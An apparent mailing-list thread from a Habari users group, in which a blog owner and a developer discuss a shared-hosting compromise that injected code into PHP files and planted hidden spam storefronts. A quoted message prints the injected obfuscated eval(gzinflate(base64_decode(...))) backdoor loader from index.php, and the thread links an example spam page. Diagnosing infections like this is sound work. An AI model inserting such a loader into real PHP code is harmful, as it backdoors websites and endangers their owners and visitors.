Thanks, Owen - I've got a clue as to what happened. I found the exact same symptom in my Wordpress 3.2.1 blog, different subdomain, same host. (my.dlma.com)
Recipe: Once in, a PHP script looks for "require_once" in other PHP files (probably preferring index.php), wraps it with its eval() statement and a payload that includes a script with a backdoor (a copy of itself, I guess), and chooses a deep random directory to set up a storefront. (Otherwise, why did it put one inside my password- protected /music/ subdirectory? No one could get there. This wasn't done by a human who bothered to navigate to the storefront.) Agree that Habari probably had nothing to do with it - although my Habari installation got infected, it probably wasn't because of a vulnerability within Habari. This could be an old WordPress vulnerability. (If it's possible that PHP walk the directory structure from my "home" directory. That'd suck.) Here's an example storefront hidden within a WordPress subdirectory (practically the exact same infection): http://www.iydu.org/wp-content/themes/desk-mess/them/1_6/coach-signature-strip-shoulder-bag-pink.html. --David On Oct 10, 12:40 pm, Owen Winkler <[email protected]> wrote: > I'm reading your posts; thanks for that. I have not had time to > investigate anything yet, though. Still, I suspect this may have more > to do with being on shared hosting and/or having other software > installed than being a Habai issue. Even known vulnerabilities in old > versions of Habari wouldn't have allowed this without you noticing it > happening via different symptoms. I suppose it's possible that Habari > allowed this, but to me it seems more likely that Habari was infected > by some other running script, maybe not installed by you or even in > another shared hosting user's account, by virtue of it having files > with PHP extensions. > > I'll see if I can turn up anything else useful from what you've > provided so far. > > Owen > > > On Oct 9, 10:02 pm, David <[email protected]> wrote: > >> Also, in my system/index.php, the following appears... > > >> // We start up output buffering in order to take advantage of output > >> compression, > >> // as well as the ability to dynamically change HTTP headers after > >> output has started. > >> ob_start(); > >> eval (gzinflate(base64_decode( > >> 'RY6xDoIwFEV3Ev6hG7L0qS1oorEumpj4D82DPqQJpdhSvl8cjNM9yzm56nJWeXYN' > >> .'9E420KaA3jsC0wzpO7hYw83gkLfegUvRtjA7FBD9+IogaYlHEoShqkl0dYOyrQ77' > >> .'nZFbQXzqp4KVpzz7xZmxYUS3gtb3x/OmNSsZZwVgmv3g0fwVtd76AA=='))); > >> spl_autoload_register( 'habari_autoload' ); > -- To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/habari-users
